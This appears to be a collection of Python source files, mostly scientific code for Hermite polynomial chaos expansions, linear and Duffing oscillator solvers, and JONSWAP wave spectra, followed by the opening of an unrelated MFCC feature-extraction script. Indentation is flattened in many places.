self.weight = self._wiener_askey_distribution()
self.set_coef(coef)
self._update_basis()
    def gauss_quadrature(self, n, loc=None, scale=None):
"""
Gauss-HermiteE quadrature.
Computes the sample points and weights for Gauss-HermiteE quadrature.
These sample points and weights will correctly integrate polynomials of degree 2*deg - 1 or less over the interval [-\inf, \inf] with the weight function f(x) = \exp(-x^2/2) for probabilists and weight function f(x) = \exp(-x^2) for physicists
Parameters:
deg : int
Number of sample points and weights. It must be >= 1.
Returns:
x : ndarray
1-D ndarray containing the sample points.
y : ndarray
1-D ndarray containing the weights.
"""
        self.n_gauss = pu.check_int(n)
        ## for unspecified distribution parameters, default (loc, scale) = (0, 1)
        ## None defaults avoid mutating a shared default list across calls
        loc   = [] if loc   is None else list(loc)
        scale = [] if scale is None else list(scale)
        for _ in range(len(loc), self.ndim):
            loc.append(0)
            scale.append(1)
coords = []
weight = []
if self.hem_type.startswith('prob'):
for iloc, iscale in zip(loc, scale):
x, w = np.polynomial.hermite_e.hermegauss(self.n_gauss)
x = iloc + iscale* x
w = iscale * w
coords.append(x)
weight.append(w)
elif self.hem_type.startswith('phy'):
for iloc, iscale in zip(loc, scale):
x, w = np.polynomial.hermite.hermgauss(self.n_gauss)
x = iloc + iscale* x
w = iscale * w
coords.append(x)
weight.append(w)
else:
raise ValueError('hem_type is either probabilists or physicists')
x = np.array(list(itertools.product(*coords))).T
x = x.reshape(self.ndim, -1)
w = np.prod(np.array(list(itertools.product(*weight))).T, axis=0)
w = np.squeeze(w)
return x, w
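    # Example (illustrative, probabilists' weight exp(-x^2/2)):
    #   x, w = Hermite(d=1, deg=2, hem_type='probabilists').gauss_quadrature(5)
    #   np.sum(w * x[0]**2)   # ~ sqrt(2*pi) ~ 2.5066, since int x^2 exp(-x^2/2) dx = sqrt(2*pi)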
def vandermonde(self, x, normalize=True):
"""
Pseudo-Vandermonde matrix of given degree.
Arguments:
x: ndarray of shape(ndim, nsamples)
normalize: boolean
return:
vandermonde matrix of shape(nsampels, deg)
"""
x = np.array(x, copy=0, ndmin=2) + 0.0
d, n = x.shape
assert (d == self.ndim), 'Expected input dimension {:d}, but {:d} given '.format(self.ndim, d)
if self.hem_type == 'probabilists':
vander_1d = np.array([np.polynomial.hermite_e.hermevander(ix, self.deg) for ix in x])
elif self.hem_type == 'physicists':
vander_1d = np.array([np.polynomial.hermite.hermvander(ix, self.deg) for ix in x])
else:
raise ValueError('hem_type is either probabilists or physicists')
vander = np.ones((n, self.num_basis))
        ## basis_degree, list of tuples containing degree components for each basis function, e.g. (3,0,2) -> x1**3 * x2**0 * x3**2
if self.basis_degree is None:
self._update_basis()
for i, ibasis_degree in enumerate(self.basis_degree):
### ibasis_degree = (l,m,n,k), assume ndim=4
for idim, ideg in enumerate(ibasis_degree):
### (0,l), (1,m), (2,n), (3,k)
vander[:,i] = vander[:,i] * vander_1d[idim,:,ideg]
if normalize:
vander = vander / np.sqrt(self.basis_norms)
return vander
def set_ndim(self, ndim):
"""
set the dimension of polynomial
"""
self.ndim = pu.check_int(ndim)
self._update_basis()
def set_degree(self, deg):
"""
set polynomial degree order
"""
self.deg = pu.check_int(deg)
self._update_basis()
def set_coef(self, coef):
"""
set polynomial coef
Arguments: None, or scalar, array-like
if coef is scalar, all polynomial coefficient will be assigned as that same value
"""
self._update_basis()
if coef is None:
coef = None
elif np.ndim(coef) == 0:
coef = np.ones(self.num_basis) * coef + 0.0
else:
if len(coef) != self.num_basis:
raise TypeError('Expected coefficients has length {}, but {} is given'.format(self.num_basis, len(coef)))
self.coef = coef
def _wiener_askey_distribution(self):
"""
Return Askey-Wiener distributions
"""
if self.ndim is None:
weight = None
elif self.hem_type.lower().startswith('prob'):
weight = stats.norm(0,1)
elif self.hem_type.lower().startswith('phy'):
weight = stats.norm(0,np.sqrt(0.5))
else:
            raise ValueError('UQRA.Hermite: hem_type {} is not defined'.format(self.hem_type))
return weight
def _update_basis(self):
"""
Return a list of polynomial basis function with specified degree and multi_index rule
"""
### get self.basis_degree and self.num_basis
        ### - basis_degree, list of tuples containing degree components for each basis function, e.g. (3,0,2) -> x1**3 * x2**0 * x3**2
super()._update_basis()
if self.basis_degree is None:
self.basis = None
self.basis_norms = None
else:
if self.hem_type == 'probabilists':
norms_1d = np.array([math.factorial(i) for i in range(self.deg+1)])
basis = []
basis_norms = []
## calculate the ith multidimensional polynomial element of order(l,m,n)
for ibasis_degree in self.basis_degree:
ibasis = 1.0
inorms = 1.0
## polynomial element (l,m,n)
for ideg in ibasis_degree:
ibasis = ibasis * np.polynomial.hermite_e.HermiteE.basis(ideg)
inorms = inorms * norms_1d[ideg]
basis.append(ibasis)
basis_norms.append(inorms)
self.basis = basis
self.basis_norms = np.array(basis_norms)
elif self.hem_type == 'physicists':
norms_1d = np.array([math.factorial(i) * 2**i for i in range(self.deg+1)])
basis = []
basis_norms = []
for ibasis_degree in self.basis_degree:
ibasis = 1.0
inorms = 1.0
for ideg in ibasis_degree:
ibasis = ibasis * np.polynomial.hermite.Hermite.basis(ideg)
inorms = inorms * norms_1d[ideg]
basis.append(ibasis)
basis_norms.append(inorms)
self.basis = basis
self.basis_norms = np.array(basis_norms)
else:
raise ValueError('hem_type is either probabilists or physicists')
return self.basis, self.basis_norms
def __call__(self, x):
"""
Evaluate polynomials at given values x
Arguments:
x, ndarray of shape (ndim, nsamples)
"""
self._update_basis()
x = np.array(x, copy=False, ndmin=2)
d, n = x.shape ## (ndim, samples)
if d != self.ndim:
raise TypeError('Expected x has dimension {}, but {} is given'.format(self.ndim, d))
if self.coef is None:
self.coef = np.ones((self.num_basis,))
size_of_array_4gb = 1e8/2.0
        ## evaluate in batches if the full Vandermonde matrix (nsamples x num_basis) would be too large to hold in memory
if x.shape[1] * self.num_basis < size_of_array_4gb:
vander = self.vandermonde(x)
y = np.sum(vander * self.coef, -1)
else:
            batch_size = math.floor(size_of_array_4gb/self.num_basis) ## number of samples evaluated per batch
y = []
for i in range(math.ceil(x.shape[1]/batch_size)):
idx_beg = i*batch_size
idx_end = min((i+1) * batch_size, x.shape[1])
x_ = x[:,idx_beg:idx_end]
# vander_ = self.vandermonde(x_)
vander_ = self.vandermonde(x_)
y += list(np.sum(vander_ * self.coef, -1))
y = np.array(y)
return y
def __str__(self):
self._update_basis()
if self.coef is None:
self.coef = np.ones((self.num_basis,))
return str(sum([ibasis * icoef for ibasis, icoef in zip(self.basis, self.coef)]))
# raise NotImplementedError
```
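The probabilists' normalization above relies on E[He_n(Z)^2] = n! for Z ~ N(0,1), which is where the `norms_1d = factorial(i)` values come from. A minimal, self-contained check of that identity with plain numpy/scipy (independent of the uqra API, so nothing here is taken from the package itself):
```python
import math
import numpy as np
from scipy import stats
from numpy.polynomial.hermite_e import HermiteE

# Monte Carlo check of E[He_n(Z)^2] = n! for probabilists' Hermite polynomials
z = stats.norm(0, 1).rvs(size=200000, random_state=42)
for n in range(5):
    He_n = HermiteE.basis(n)            # probabilists' Hermite polynomial of degree n
    mc_norm = np.mean(He_n(z) ** 2)     # Monte Carlo estimate of the squared norm
    print(n, round(mc_norm, 2), math.factorial(n))
```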
#### File: uqra/polynomial/poly.py
```python
import numpy as np
import itertools, math
from ._polybase import PolyBase
import scipy.stats as stats
from .hermite import Hermite
from .legendre import Legendre
def orthogonal(ndim, p, poly_name):
poly_name = poly_name.lower()
if poly_name == 'leg':
orth_basis = Legendre(d=ndim,deg=p)
elif poly_name == 'hem':
orth_basis = Hermite(d=ndim,deg=p, hem_type='physicists')
elif poly_name == 'heme':
orth_basis = Hermite(d=ndim,deg=p, hem_type='probabilists')
else:
raise NotImplementedError
return orth_basis
```
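A hedged usage sketch of the `orthogonal` factory above. The import path is an assumption based on the file layout shown here, and only constructor arguments and methods visible in these listings are used:
```python
import numpy as np
from uqra.polynomial.poly import orthogonal   # assumed import path, matching the file layout above

basis = orthogonal(ndim=2, p=3, poly_name='heme')   # probabilists' Hermite basis in 2 dimensions
basis.set_coef(1.0)                                 # give every basis function the same coefficient
u = np.random.RandomState(0).normal(size=(2, 5))    # samples of shape (ndim, nsamples)
print(basis(u))                                     # evaluate the expansion at the 5 sample points
```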
#### File: solver/collections/dynamic.py
```python
import uqra
from uqra.solver._solverbase import SolverBase
import os, numpy as np, scipy as sp
# from scipy.integrate import odeint
# from scipy.optimize import brentq
from .PowerSpectrum import PowerSpectrum
from uqra.environment import Kvitebjorn
from tqdm import tqdm
class linear_oscillator(SolverBase):
"""
Solving linear oscillator in frequency domain
m x'' + c x' + k x = f
=> x'' + 2*zeta*omega_n x' + omega_n**2 x = 1/m * f
where, omega_n = sqrt(k/m), zeta = c/(2*sqrt(m*k))
default value: omega_n = 1/pi Hz (2 rad/s), zeta = 0.01
f: frequency in Hz
t: array, A sequence of time points for which to solve for y.
args, tuple, oscillator arguments in order of (mass, damping, stiffness)
kwargs, dictionary, spectrum definitions for the input excitation functions
"""
def __init__(self, **kwargs):
super().__init__()
        self.name = 'linear oscillator'
self.nickname = 'SDOF'
self.spec_name = kwargs.get('spec_name', 'JONSWAP')
self.ndim_spec = PowerSpectrum(self.spec_name).ndim
self.ndim = self.ndim_spec + int(0) ## need to change when cmk are also random
self.out_responses= kwargs.get('out_responses', 'ALL')
self.out_stats = kwargs.get('out_stats', ['mean', 'std', 'skewness', 'kurtosis', 'absmax', 'absmin', 'up_crossing'])
self.axis = kwargs.get('axis', 0)
self.tmax = kwargs.get('time_max', 1000)
self.dt = kwargs.get('dt', 0.1)
self.distributions= kwargs.get('environment', Kvitebjorn)
self.dist_name = self.distributions.__name__.split('.')[-1]
self.n_short_term= kwargs.get('n_short_term', 10) ## number of short term simulations
# self.theta_m = []
# self.theta_s = []
### two ways defining mck
if 'k' in kwargs.keys() and 'c' in kwargs.keys():
self.m = kwargs.get('m', 1)
self.k = kwargs['k']
self.c = kwargs['c']
self.zeta = self.c/(2*np.sqrt(self.m*self.k))
self.omega_n= 2*np.pi*np.sqrt(self.k/self.m) # rad/s
else:
self.zeta = kwargs.get('zeta', 0.01)
self.omega_n= kwargs.get('omega_n', 2) # rad/s
self.m = kwargs.get('m', 1)
self.k = (self.omega_n/2/np.pi) **2 * self.m
self.c = self.zeta * 2 * np.sqrt(self.m * self.k)
self.mck = (self.m, self.c, self.k)
def __str__(self):
        message = 'Single Degree of Freedom Oscillator: \n' + \
' - {:<15s} : {}\n'.format('mck' , np.around(self.mck, 2)) + \
' - {:<15s} : {}\n'.format('zeta' , np.around(self.zeta, 2)) + \
' - {:<15s} : {}\n'.format('omega_n' , np.around(self.omega_n, 2)) + \
' - {:<15s} : {}\n'.format('spec_name', self.spec_name) + \
' - {:<15s} : {}\n'.format('out_responses', self.out_responses) + \
' - {:<15s} : {}\n'.format('time_max' , self.tmax) + \
' - {:<15s} : {}\n'.format('dt' , self.dt)
return message
def run(self, x, return_all=False, random_seed=None, **kwargs):
"""
run linear_oscillator:
Arguments:
x, power spectrum parameters, ndarray of shape (n_parameters, nsamples)
"""
np.random.seed(random_seed)
n_short_term = kwargs.get('n_short_term', self.n_short_term)
out_responses = kwargs.get('out_responses', self.out_responses)
x = np.array(x.T, copy=False, ndmin=2)
# x = x.reshape(-1,1) if x.ndim_spec == 1 else x
## if x is just one set of input of shape (2, 1)
y_QoI = []
seeds = np.random.randint(0, int(2**32-1), size=n_short_term)
for ishort_term in range(n_short_term):
            # zip(*...) yields tuples; map(list, ...) converts each back to a list
pbar_x = tqdm(x, ascii=True, desc=" - {:d}/{:d} ".format(ishort_term, self.n_short_term))
y_raw_, y_QoI_ = map(list, zip(*[self._linear_oscillator(ix, seed=seeds[ishort_term], out_responses=out_responses) for ix in pbar_x]))
y_QoI.append(y_QoI_)
if return_all:
np.save('{:s}_raw{:d}'.format(self.nickname,ishort_term), np.array(y_raw_))
return np.array(y_QoI)
def x_psd(self, f, x, **kwargs):
"""
Return the power spectral density (PSD) estimate, pxx, at frequency,f, for the given PowerSpectrum with given parameters x
Returns:
PowerSpectrum object of input signal
"""
spec_name = kwargs.get('spec_name', self.spec_name)
psd_x = PowerSpectrum(spec_name, *x)
x_pxx = psd_x.get_pxx(f)
return psd_x
def psd(self,f,x):
"""
Return the psd estimator of both input and output signals at frequency f for specified PowerSpectrum with given parameters x
Arguments:
f: frequency in Hz
x: PowerSpectrum parameters
Returns:
PowerSpectrum object of input and output signal
"""
H_square = 1.0/np.sqrt( (self.k-self.m*f**2)**2 + (self.c*f)**2 )
psd_x = self.x_psd(f, x)
y_pxx = H_square * psd_x.pxx
psd_y = PowerSpectrum('SDOF')
psd_y.set_psd(psd_x.f, y_pxx)
return psd_x, psd_y
def _linear_oscillator(self, x, seed=None,out_responses='ALL'):
"""
Solving linear oscillator in frequency domain
m x'' + c x' + k x = f =>
x'' + 2*zeta*omega_n x' + omega_n**2 x = 1/m f, where, omega_n = sqrt(k/m), zeta = c/(2*sqrt(m*k))
default value: omega_n = 0.15 Hz, zeta = 0.01
f: frequency in Hz
t: array, A sequence of time points for which to solve for y.
args, tuple, oscillator arguments in order of (mass, damping, stiffness)
kwargs, dictionary, spectrum definitions for the input excitation functions
"""
assert len(x) == self.ndim_spec, "Expecting {:d} variables but {:d} given".format(self.ndim_spec, len(x))
t = np.arange(0,int(self.tmax/self.dt) +1) * self.dt
tmax = t[-1]
df = 0.5/tmax
f = np.arange(len(t)+1) * df
##--------- oscillator properties -----------
psd_x, psd_y = self.psd(f, x)
t0, x_t = psd_x.gen_process(seed=seed)
t1, y_t = psd_y.gen_process(seed=seed)
assert (t0==t1).all()
y_raw = np.vstack((t0, x_t, y_t)).T
uqra.blockPrint()
y_QoI = uqra.get_stats(y_raw, out_responses=out_responses, out_stats=self.out_stats, axis=0)
uqra.enablePrint()
return y_raw, y_QoI
def map_domain(self, u, u_cdf):
"""
mapping random variables u from distribution dist_u (default U(0,1)) to self.distributions
Argument:
u and dist_u
"""
if isinstance(u_cdf, np.ndarray):
            assert (u_cdf.shape[0] == self.ndim_spec), '{:s} expecting {:d} random variables, {:d} given'.format(self.name, self.ndim_spec, u_cdf.shape[0])
if self.distributions.__name__ == 'uqra.environment.Kvitebjorn':
x = Kvitebjorn.ppf(u_cdf)
else:
raise ValueError('Distribution name not defined: {:s}'.format(self.distributions.__name__))
else:
u, dist_u = super().map_domain(u, u_cdf)
u_cdf = np.array([idist.cdf(iu) for iu, idist in zip(u, dist_u)])
if self.distributions.__name__ == 'uqra.environment.Kvitebjorn':
x = Kvitebjorn.ppf(u_cdf)
else:
raise ValueError('Distribution name not defined: {:s}'.format(self.distributions.__name__))
x = x.reshape(self.ndim, -1)
return x
class duffing_oscillator(SolverBase):
"""
Solve the Duffing oscillator in time domain solved by Runge-Kutta RK4
m x'' + c x' + k x + s x^3 = f
=> x'' + 2*zeta*omega_n*x' + omega_n^2*x + s/m x^3 = 1/m * f
where, omega_n = sqrt(k/m), zeta = c/(2*sqrt(m*k))
Default value:
- mcks : [1. 0.01 0.1 0.02]
- zeta : 0.01
- omega_n : 2 rad/s
>> Nonlinear spring term: omega_n^2*x + s/m x^3
1. Hardening spring: s > 0
2. Softening spring: s < 0
|(s/m) / (omega_n^2)| => |s / k| ~ 0.1, reference Doostan:[0.25, 0.75]
default: s = 0.2 k, => s/m = 0.2*omega_n^2 = 0.0045
f : frequency in Hz
dt : scalar, time step
args, tuple, oscillator arguments in order of (mass, damping, stiffness)
kwargs, dictionary, spectrum definitions for the input excitation functions
"""
def __init__(self, **kwargs):
super().__init__()
self.name = 'Duffing oscillator'
self.nickname = 'Duffing'
self.spec_name = kwargs.get('spec_name', None)
self.ndim_spec = PowerSpectrum(self.spec_name).ndim
self.ndim = self.ndim_spec + int(0) ## need to change when cmk are also random
self.excitation = kwargs.get('excitation', None)
self.out_responses= kwargs.get('out_responses', 'ALL')
self.out_stats = kwargs.get('out_stats', ['mean', 'std', 'skewness', 'kurtosis', 'absmax', 'absmin', 'up_crossing'])
self.axis = kwargs.get('axis', 0)
self.tmax = kwargs.get('time_max', 1000)
        self.tmax = kwargs.get('tmax', self.tmax)
self.dt = kwargs.get('dt', 0.1)
self.y0 = kwargs.get('y0', [1,0]) ## initial condition
self.distributions= kwargs.get('environment', Kvitebjorn)
self.dist_name = self.distributions.__name__.split('.')[-1]
self.n_short_term= kwargs.get('n_short_term', 10) ## number of short term simulations
self.method = kwargs.get('method', 'RK45')
### two ways defining mcks
if 'k' in kwargs.keys() and 'c' in kwargs.keys():
self.m = kwargs.get('m', 1)
self.k = kwargs['k']
self.c = kwargs['c']
self.s = kwargs.get('s', 0.2* self.k)
# self.zeta = self.c/(2*np.sqrt(self.m*self.k))
# self.omega_n= 2*np.pi*np.sqrt(self.k/self.m) # rad/s
else:
self.zeta = kwargs.get('zeta', 0.01)
self.omega_n= kwargs.get('omega_n', 2) # rad/s
self.m = kwargs.get('m', 1)
self.k = (self.omega_n/2/np.pi) **2 * self.m
self.c = self.zeta * 2 * np.sqrt(self.m * self.k)
self.s = kwargs.get('s', 0.2 * self.k)
self.mcks = (self.m, self.c, self.k, self.s)
def __str__(self):
message = 'Duffing Oscillator: \n' + \
' - {:<15s} : {}\n'.format('mcks' , np.around(self.mcks, 2)) + \
' - {:<15s} : {}\n'.format('excitation', self.excitation.__name__ if self.excitation else self.spec_name) + \
' - {:<15s} : {}\n'.format('out_responses', self.out_responses) + \
' - {:<15s} : {}\n'.format('time_max' , self.tmax) + \
' - {:<15s} : {}\n'.format('dt' , self.dt)
return message
def run(self, x, return_all=False, random_seed=None, **kwargs):
"""
solving duffing equation:
Arguments:
x, power spectrum parameters, ndarray of shape (nsamples, n_parameters)
"""
np.random.seed(random_seed)
n_short_term = kwargs.get('n_short_term', self.n_short_term)
out_responses = kwargs.get('out_responses', self.out_responses)
x = np.array(x.T, copy=False, ndmin=2)
        y_QoI = []
seeds = np.random.randint(0, int(2**32-1), size=n_short_term)
for ishort_term in range(n_short_term):
pbar_x = tqdm(x, ascii=True, desc=" - {:d}/{:d} ".format(ishort_term, self.n_short_term))
y_raw_, y_QoI_ = map(list, zip(*[self._duffing_oscillator(ix, seed=seeds[ishort_term], out_responses=out_responses) for ix in pbar_x]))
y_QoI.append(y_QoI_)
if return_all:
np.save('{:s}_raw{:d}'.format(self.nickname,ishort_term), np.array(y_raw_))
return np.array(y_QoI)
def map_domain(self, u, dist_u):
"""
Mapping random variables u from distribution dist_u (default U(0,1)) to self.distributions
Argument:
u and dist_u
"""
### convert dist_u to list and append to dist_u with U(0,1) if necessary to make sure the dimension matches
u, dist_u = super().map_domain(u, dist_u)
u_cdf = np.array([idist.cdf(iu) for iu, idist in zip(u, dist_u)])
assert (u_cdf.shape[0] == self.ndim_spec), '{:s} expecting {:d} random variables, {:d} given'.format(self.name, self.ndim_spec, u_cdf.shape[0])
if isinstance(self.distributions, list):
x = np.array([idist.ppf(iu_cdf) for iu_cdf, idist in zip(u_cdf, self.distributions)])
elif self.distributions.__name__ == 'uqra.environment.Kvitebjorn':
x = Kvitebjorn.ppf(u_cdf)
x = x.reshape(self.ndim, -1)
return x
def _duffing_oscillator(self, x, seed=None, out_responses='ALL'):
assert len(x) == self.ndim_spec, "Expecting {:d} variables but {:d} given".format(self.ndim_spec, len(x))
t = np.arange(0,int(self.tmax/self.dt) +1) * self.dt
self.excitation = self._excitation_func(x, seed=seed)
x_t = self.excitation(t)
solution = sp.integrate.solve_ivp(self._rhs_odes, [0,self.tmax], self.y0, t_eval=t, args=[self.excitation],method=self.method)
y_raw = np.vstack((t, x_t, solution.y)).T
uqra.blockPrint()
y_QoI = uqra.get_stats(y_raw, out_responses=out_responses, out_stats=self.out_stats, axis=0)
uqra.enablePrint()
return y_raw, y_QoI
def _rhs_odes(self, t, y, f):
"""
Reformulate 2nd order ODE to a system of ODEs.
dy / dt = f(t, y)
Here t is a scalar,
Let u = y, v = y', then:
u' = v
v' = -2*zeta*omega_n*v - omega_n^2*u - s/m u^3 + 1/m * f
Arguments:
t: scalar
y: ndarray has shape (n,), e.g. [y, y']
f: callable function taken t as argument
Return:
(u', v')
"""
y0, y1 = y
vdot =1.0/self.m * (-self.c *y1 - self.k*y0 - self.s * y0**3 + f(t))
return y1, vdot
# V = lambda x: beta/4 * x**4 - alpha/2 * x**2
# dVdx = lambda x: beta*x**3 - alpha*x
# x, xdot = X
# if source_interp is None:
# xdotdot = -dVdx(x) -delta * xdot + gamma * np.cos(omega*t)
# else:
# xdotdot = -dVdx(x) -delta * xdot + gamma * np.cos(omega*t) + source_interp(t)
# return xdot, xdotdot
def _excitation_func(self, x, seed=None):
"""
Return the excitation function f on the right hand side
Returns:
a function take scalar argument
"""
if self.excitation is not None:
f = self.excitation
else:
if self.spec_name is not None:
t = np.arange(0,int(1.10* self.tmax/self.dt)) * self.dt
tmax = t[-1]
df = 0.5/tmax
freq = np.arange(len(t)+1) * df
psd_x = PowerSpectrum(self.spec_name, *x)
x_pxx = psd_x.get_pxx(freq)
t0, x_t = psd_x.gen_process(seed=seed)
f = sp.interpolate.interp1d(t0, x_t,kind='cubic')
else:
f = lambda t: t * 0
return f
# def _cal_normalize_values(zeta,omega0,source_kwargs, *source_args):
# TF = lambda w : 1.0/np.sqrt((w**2-omega0**2)**2 + (2*zeta*omega0)**2)
# spec_dict = psd.get_spec_dict()
# spec_name = source_kwargs.get('name','JONSWAP') if source_kwargs else 'JONSWAP'
# spec_side = source_kwargs.get('sides', '1side') if source_kwargs else '1side'
# spec_func = spec_dict[spec_name]
# nquads = 100
# if spec_side.upper() in ['2','2SIDE','DOUBLE','2SIDES']:
# x, w = np.polynomial.hermite_e.hermegauss(nquads)
# elif spec_side.upper() in ['1','1SIDE','SINGLE','1SIDES']:
# x, w = np.polynomial.laguerre.laggauss(nquads)
# else:
# raise NotImplementedError("Spectrum side type '{:s}' is not defined".format(spec_side))
# _,spec_vals = spec_func(x, *source_args)
# spec_vals = spec_vals.reshape(nquads,1)
# TF2_vals = (TF(x)**2).reshape(nquads,1)
# w = w.reshape(nquads,1)
# norm_y = np.sum(w.T *(spec_vals*TF2_vals))/(2*np.pi)
# norm_y = 1/norm_y**0.5
# norm_t = omega0
# return norm_t, norm_y
# def _normalize_source_func(source_func, norm_t, norm_y):
# def wrapper(*args, **kwargs):
# t, y = source_func(*args, **kwargs)
# return t*norm_t, y*norm_y/ norm_t**2
# return wrapper
# def duffing_oscillator(tmax,dt,x0,v0,zeta,omega0,mu,\
# *source_args, source_func=None, source_kwargs=None,t_trans=0, normalize=False):
# if normalize:
# # norm_t, norm_y = normalize[1], normalize[2]
# norm_t, norm_y = _cal_normalize_values(zeta, omega0, source_kwargs)
# # print('Normalizing value: [{:.2f}, {:.2f}]'.format(norm_t, norm_y))
# assert norm_t!= 0
# delta = 2 * zeta * omega0 / norm_t
# alpha = omega0**2 / norm_t**2
# beta = mu*omega0**2/(norm_y**2 * norm_t**2)
# # print('delta:{:.2f}, alpha: {:.2f}, beta: {:.2f}'.format(delta, alpha, beta))
# dt_per_period = int(2*np.pi/omega0/dt)
# tmax = norm_t*tmax
# dt = norm_t* dt
# source_func = _normalize_source_func(source_func, norm_t, norm_y) if source_func else source_func
# source_args = source_args/omega0 if source_args else source_args
# gamma,omega = 0,1 # gamma ==0 with arbitrary omega
# t, X, dt, pstep = duffing_equation(tmax,dt_per_period,x0,v0,gamma,delta,omega,\
# *source_args, source_func=source_func, source_kwargs=source_kwargs,\
# t_trans=t_trans, alpha=alpha, beta=beta)
# else:
# delta = 2 * zeta * omega0
# alpha = omega0**2
# beta = omega0**2 * mu
# dt_per_period = int(2*np.pi/omega0/dt)
# gamma,omega = 0,1 # gamma ==0 with arbitrary omega
# t, X, dt, pstep = duffing_equation(tmax,dt_per_period,x0,v0,gamma,delta,omega,\
# *source_args, source_func=source_func, source_kwargs=source_kwargs,\
# t_trans=t_trans, alpha=alpha, beta=beta)
# t = np.reshape(t,(len(t),1))
# res = np.concatenate((t,X),axis=1)
# return res, dt, pstep
# def duffing_equation(tmax, dt_per_period, x0, v0,gamma,delta,omega,\
# *source_args, source_func=None, source_kwargs=None,alpha=1,beta=1,t_trans=0):
# """
# Solve the Duffing equation for parameters gamma, delta, omega.
# https://scipython.com/blog/the-duffing-oscillator/
# Find the numerical solution to the Duffing equation using a suitable
# time grid:
# - tmax is the maximum time (s) to integrate to;
# - t_trans is the initial time period of transient behaviour until the solution settles down (if it does) to some kind of periodic motion (these data
# points are dropped) and
# - dt_per_period is the number of time samples (of duration dt) to include per period of the driving motion (frequency omega).
# x'' + delta x' + alpha x + beta x^3 = gamma * cos(omega t)
# x(0) = x'(0)
# Returns the time grid, t (after t_trans), position, x, and velocity,
# xdot, dt, and step, the number of array points per period of the driving
# motion.
# """
# # Time point spacings and the time grid
# period = 2*np.pi/omega
# dt = int(2*np.pi/omega / dt_per_period * 1000)/1000
# step = int(period / dt)
# t = np.arange(0, tmax, dt)
# # Initial conditions: x, xdot
# X0 = [x0, v0]
# if callable(source_func):
# _t = np.arange(0, tmax+period, dt)
# _, source = source_func(_t, *source_args, kwargs=source_kwargs)
# source_interp = sp.interpolate.interp1d(_t, source,kind='cubic')
# else:
# source_interp = None
# X = odeint(_deriv, X0, t, args=(gamma, delta, omega,alpha, beta, source_interp))
# idx = int(t_trans / dt)
# return t[idx:], X[idx:], dt, step
# def lin_oscillator(tmax,dt,x0,v0,zeta,omega0,source_func=None,t_trans=0, *source_args):
# source_func = source_func if callable(source_func) else 0
# x = duffing_oscillator(tmax,dt,x0,v0,zeta,omega0,0,source_func=source_func,t_trans=t_trans)
# return x
```
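The frequency-domain solution in `linear_oscillator.psd` amounts to scaling the input spectrum by the squared magnitude of an SDOF transfer function. A standalone numpy sketch of that idea, using the textbook form |H(w)|^2 = 1/((k - m*w^2)^2 + (c*w)^2) with w in rad/s (the class above uses its own frequency convention, so this is an illustration rather than a drop-in replacement):
```python
import numpy as np

# toy single-degree-of-freedom parameters
m, k = 1.0, 4.0                       # mass and stiffness
zeta = 0.05                           # damping ratio
c = 2 * zeta * np.sqrt(m * k)         # damping coefficient
omega = np.linspace(0.01, 10, 2000)   # angular frequency grid, rad/s

S_x = np.ones_like(omega)             # flat (white-noise) input spectrum
H2 = 1.0 / ((k - m * omega**2)**2 + (c * omega)**2)   # |H(omega)|^2
S_y = H2 * S_x                        # response spectrum

print("response peaks near omega_n = sqrt(k/m):", omega[np.argmax(S_y)])
```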
#### File: uqra/solver/spectrums.py
```python
import numpy as np
def jonswap(w, Hs, Tp):
""" JONSWAP wave spectrum, IEC 61400-3
w: ndarray of shape (n,), frequencies to be sampled at, rad/s
Hs: significant wave height, m
Tp: wave peak period, sec
"""
w = np.squeeze(w)
with np.errstate(divide='ignore'):
wp = 2*np.pi/Tp
gamma = 3.3
sigma = 0.07 * np.ones(w.shape)
sigma[w > wp] = 0.09
        assert w[0] >= 0, 'Single-sided power spectrum must start at a frequency greater than or equal to 0, w[0]={:4.2f}'.format(w[0])
JS1 = 5/16 * Hs**2 * wp**4 * w**-5
JS2 = np.exp(-1.25*(w/wp)**-4) * (1-0.287*np.log(gamma))
JS3 = gamma**(np.exp(-0.5*((w-wp)/sigma/wp)**2))
JS1[np.isinf(JS1)] = 0
JS2[np.isinf(JS2)] = 0
JS3[np.isinf(JS3)] = 0
JS = JS1 * JS2 * JS3
return w, JS
def spec_test1(w, c=2):
"""
Test FFT and iFFT for spectrum and acf
F(w) = Fourier(f(t))
where
F(w) = 2c / (c**2 + w**2)
f(t) = e^(-c|t|)
Arguments:
w: frequencies to be evaluated at (Hz)
c: arbitrary real constant larger than 0
    Returns:
        w : the input frequencies, unchanged
        Sw: psd values at the specified w
"""
# print('\t{:s} : c= {:.2f}'.format(spec_test1.__name__, c))
Sw = 2*c/(c**2 + w**2)
dw = w[1] - w[0]
sa = np.sum(Sw*dw)
return w, Sw
def white_noise(w, F0=1,a=0,b=5):
Sw = F0
sa = abs(b-a) * F0
return w, Sw
```
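For a single-sided wave spectrum the zeroth moment m0 = integral of S(w) dw is tied to the significant wave height through Hs ~ 4*sqrt(m0), so integrating `jonswap` numerically should recover Hs to within a few percent. A quick check, assuming the function above is in scope (run inside this module or after importing it):
```python
import numpy as np

w = np.linspace(1e-3, 10.0, 20000)   # rad/s; start just above 0 to satisfy the assert
Hs, Tp = 3.0, 10.0
_, S = jonswap(w, Hs, Tp)
m0 = np.trapz(S, w)                  # zeroth spectral moment
print("4*sqrt(m0) =", 4 * np.sqrt(m0), "vs Hs =", Hs)
```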
#### File: uqra/utilities/classes.py
```python
import numpy as np
import sys, os
from datetime import datetime
class Logger(object):
def __init__(self):
self.terminal = sys.stdout
self.log = open("logfile.log", "w+")
now = datetime.now()
date_string = now.strftime("%d/%m/%Y %H:%M:%S")
logtext ='-'*50+'\n' + date_string +'\n'
self.log.write(logtext)
def write(self, message):
self.terminal.write(message)
self.log.write(message)
def flush(self):
#this flush method is needed for python 3 compatibility.
#this handles the flush command by doing nothing.
#you might want to specify some extra behavior here.
pass
``` |
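A small sketch of how this Logger is typically wired up: redirect `sys.stdout` so that every `print` goes both to the terminal and to `logfile.log` (with the class above in scope; the log file is created in the working directory):
```python
import sys

plain_stdout = sys.stdout
sys.stdout = Logger()                 # from the module above
print("this line goes to the screen and to logfile.log")
sys.stdout = plain_stdout             # restore the plain stdout afterwards
```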
{
"source": "jinsongpan/ASR_Course_Homework",
"score": 3
} |
#### File: ASR_Course_Homework/02-feature-extraction/mfcc.py
```python
import librosa
import numpy as np
# from scipy.fftpack import dct
import pdb
# If you want to see the spectrogram picture
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
def plot_spectrogram(spec, note, file_name):
"""Draw the spectrogram picture
:param spec: a feature_dim by num_frames array(real)
:param note: title of the picture
:param file_name: name of the file
"""
fig = plt.figure(figsize=(20, 5))
heatmap = plt.pcolor(spec)
